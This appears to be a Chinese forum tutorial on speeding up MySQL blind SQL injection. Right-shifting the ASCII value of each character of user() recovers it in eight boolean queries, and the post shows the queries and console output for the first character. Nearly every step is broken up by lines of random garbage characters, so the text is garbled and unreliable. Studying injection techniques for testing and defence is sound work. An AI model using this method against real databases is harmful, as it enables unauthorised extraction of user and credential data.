关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


. }* }; h: \, c7 g5 O
, b# o0 _# ~5 E% ?5 N% f: O( J下面将以查询mysql数据库当中user()的第一位为例:
- n5 K: _9 m9 P: x4 e
* I0 H& D8 `+ @/ F

ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

. j# u& }! Z6 e$ \3 U

首先执行如下sql语句:



mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
6 p+ {( H7 f* K: \


我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
6 \: ?4 ~: u# u, w& M


7 n5 ?' J! T: P) y" \第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
* q' h" k9 V  L6 b# r$ o
* C. i. t3 Z& M) U
, D3 G4 f; I8 R6 x" M% L! B4 {2 C
) U( ~. i+ d( B如果运算结果为1,说明第一位为0,不为1

0 c! D& K7 l" t9 o6 d0 |0 h% ]
- c6 C8 A" |8 I  p' P$ v- e
% w. z! |  ?6 N% ]( z8 d/ S+————————————–+

4 t8 a! B5 S, D: d( Y| (ascii((substr(user(),1,1))) >> 7)=0 |
0 L. a+ q1 O+ N  T' x
. _( q! _! g2 i2 O1 T- r" V; w: f+————————————–+
8 o) T: S7 k1 A0 a
| 1 |
+ B2 ^8 f( r$ l1 @: A
+————————————–+
4 b! x; _- \$ X  p$ Q5 q
1 row in set (0.00 sec)

) A% m) o: I0 ?2 i这样我们就确定这个8bit的ascii的第一位为0
. t, n4 V7 }& }, z: D


第二次我们来做6次右偏移来确定前两位
  d5 x2 f. `) d/ v

3 d! d+ X; ]1 W* y, i7 c$ y
0 z- [; J1 x1 q: _' ~. n3 w前两位可能是01或00,即依然可以与0做比较,

7 n( {* c' R5 B. r) A9 o* t* N) pmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

' X- D0 n! S8 b8 f3 ?+————————————–+
/ f7 ~. ]* Y  |8 t0 |+ ^
| (ascii((substr(user(),1,1))) >> 6)=0 |

2 L; v, Q+ H' x9 E+————————————–+

* t4 J8 ^: A9 v( l. O  F' @| 0 |

+————————————–+
% l6 x# z! j6 ]6 p4 [; Z) |1 V
1 row in set (0.00 sec)
! f  w0 g# I: T; i( C! o

. I( e* l% D+ o. A- x! O9 u( B1 H
/ Y: M# {* `: [5 _结果为0,即第二位为1

0 V: n. Q  D7 M9 m
6 x, d7 j# k8 `4 L4 x
7 J" j0 f* |! u5 b: O& f* L开始猜测前三位为010或011

& w8 Q/ H$ k( i1 e4 Q, z

让我们看看010和011的ascii码是多少


( A4 X# k9 B& h, K" r: ?  B
% L! E! b: P/ k分别查询select b’011′ select b’010′

7 z) ]4 s4 d2 @  G8 i8 h/ k

" B" U4 L- q- y9 Y/ P8 y! [- n获得结果 010 = 2 011 = 3
. y; N2 J/ x0 s1 Q0 {+ C  d9 W
- z1 @1 J3 \* d# A* m/ h, n
# T* A3 E3 F" b* a3 d
7 L/ k& I  o1 l" f# G& |1 E. h. D执行如下sql:
0 s1 q9 t$ G3 k- l/ Y


- y2 y/ H/ i( f% Jmysql> select (ascii((substr(user(),1,1))) >> 5)=2;
% a' f4 I% m& O& U1 F8 I" z" v
' \; x# V/ P( d8 d; ?" ?+————————————–+
5 B$ p3 L, V/ F" M5 }/ d0 {  ^
  _6 j! V( s- N+ e1 q/ F/ o2 h* t| (ascii((substr(user(),1,1))) >> 5)=2 |
7 x# i2 ]" x& t
+————————————–+
6 o+ c) t9 k' j- P% m; p
| 0 |

+————————————–+
0 O" B1 f% E. O7 I) \
即前三位不为010,而是011
4 u1 S6 z4 E) X: x/ C* F$ U% T; s
9 T/ h" O7 m$ e

0 h7 B" r2 Q/ n& Q+ L直到获得最后一位



最终结果为:01110010
3 y: a* V. r1 q, Q5 O
: r3 v! ^% J  ]

转换一下:
4 K# m8 _& z& }) h$ s
1 J& @5 s. R- O" k. S
: |& w2 J) P1 r" r
select b’01110010′


- ]1 a, O' M/ E" m6 F4 L
* W6 W( s6 n0 z& ]: F查询结果
* ~+ q/ b9 S! U: X

# |: v$ x1 f: m7 {- U4 t8 e  x
2 M: ]' P' ]5 ~5 u0 }5 G+————-+
% c0 r* e' i# B) ?: ]
| b’01110010′ |
# l6 z  O  z8 k1 i% W+ Q/ ?9 x
3 @; l9 W) m0 o' [- T+————-+
0 S& a1 c  R7 o3 D  `2 I0 G
| r |
  _: o/ S% L1 D* L' o% ~! Z7 z" f
) F/ W3 ]! i% O0 ?! V+————-+

1 row in set (0.00 sec)


# }& q; a! n- d' k4 Y0 t  H" h( A
这样我们就获得了user()的第一位.其它位依此类推